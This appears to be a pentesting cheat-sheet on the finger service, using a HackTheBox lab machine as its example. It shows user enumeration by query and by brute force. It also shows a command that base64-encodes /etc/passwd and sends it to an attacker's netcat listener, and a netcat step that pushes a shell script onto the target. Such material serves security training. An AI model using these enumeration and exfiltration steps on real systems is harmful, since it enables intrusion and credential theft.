# Pentesting Finger ### Overview: * The [finger](https://en.wikipedia.org/wiki/Finger_protocol) daemon listens on port 79, and is really a relic of a time when computers were far too trusting and open. It provides status reports on logged in users. It can also provide details about a specific user and when they last logged in and from where. * Credit: ``` PORT STATE SERVICE VERSION 79/tcp open finger Sun Solaris fingerd ``` * Finger is an exceedingly old protcol very rarely in use today. * Nmap results can show logged in users ``` | finger: Login Name TTY Idle When Where\x0D | sunny sunny pts/1 Thu 14:52 10.10.14.245 \x0D ``` ### Check for logged in users ``` finger @10.10.10.76 No one logged on ``` ### Check for details on a user ``` finger jack@10.10.10.76 jack ??? #above does not exist finger root@10.10.10.76 Login Name TTY Idle When Where root Super-User console #user that does exist and is logged in finger ikeuser@10.10.10.76 Login Name TTY Idle When Where ikeuser IKE Admin < . . . . > #user that does exist but is not logged in ``` ### Bruteforce Users If finger returns no logged in users, we can try to brute force usernames. We’ll use the [finger-user-enum.pl](http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz) script from pentestmonkey. ``` root@kali:~# ./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t 10.10.10.76 Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum ) ---------------------------------------------------------- | Scan Information | ---------------------------------------------------------- Worker Processes ......... 5 Usernames file ........... /opt/SecLists/Usernames/Names/names.txt Target count ............. 1 Username count ........... 10163 Target TCP port .......... 79 Query timeout ............ 5 secs Relay Server ............. Not used ######## Scan started at Thu Sep 27 17:39:02 2018 ######### access@10.10.10.76: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >.. admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..uucp uucp Admin < . . . . >..nuucp uucp Admin < . . . . >..dladm Datalink Admin < . . . . >..listen Network Admin < . . . . >.. anne marie@10.10.10.76: Login Name TTY Idle When Where..anne ???..marie ???.. bin@10.10.10.76: bin ??? < . . . . >.. dee dee@10.10.10.76: Login Name TTY Idle When Where..dee ???..dee ???.. jo ann@10.10.10.76: Login Name TTY Idle When Where..jo ???..ann ???.. la verne@10.10.10.76: Login Name TTY Idle When Where..la ???..verne ???.. line@10.10.10.76: Login Name TTY Idle When Where..lp Line Printer Admin ``` ### Finger for file Transfers #### finger for File Transfer While working on this post, I was checking out [gtfobins](https://gtfobins.github.io/), and their page on finger shows how it can be used for file transfer. For example, to exfil the password file from Sunday, with the listener started locally: ``` root@sunday:~# finger "$(base64 /etc/passwd)"@10.10.14.5 [10.10.14.5] ``` ``` root@kali:~/hackthebox/sunday-10.10.10.76# nc -lnvp 79 | base64 -d > passwd listening on [any] 79 ... connect to [10.10.14.5] from (UNKNOWN) [10.10.10.76] 54768 root@kali:~/hackthebox/sunday-10.10.10.76# cat passwd root:x:0:0:Super-User:/root:/usr/bin/bash daemon:x:1:1::/: ...[snip]... ``` You can upload files to a target machine as well: ``` root@kali:~/hackthebox/sunday-10.10.10.76# cat shell.py | base64 | nc -lp 79 ``` ``` root@sunday:~# finger x@10.10.14.5 > shell.b64 ```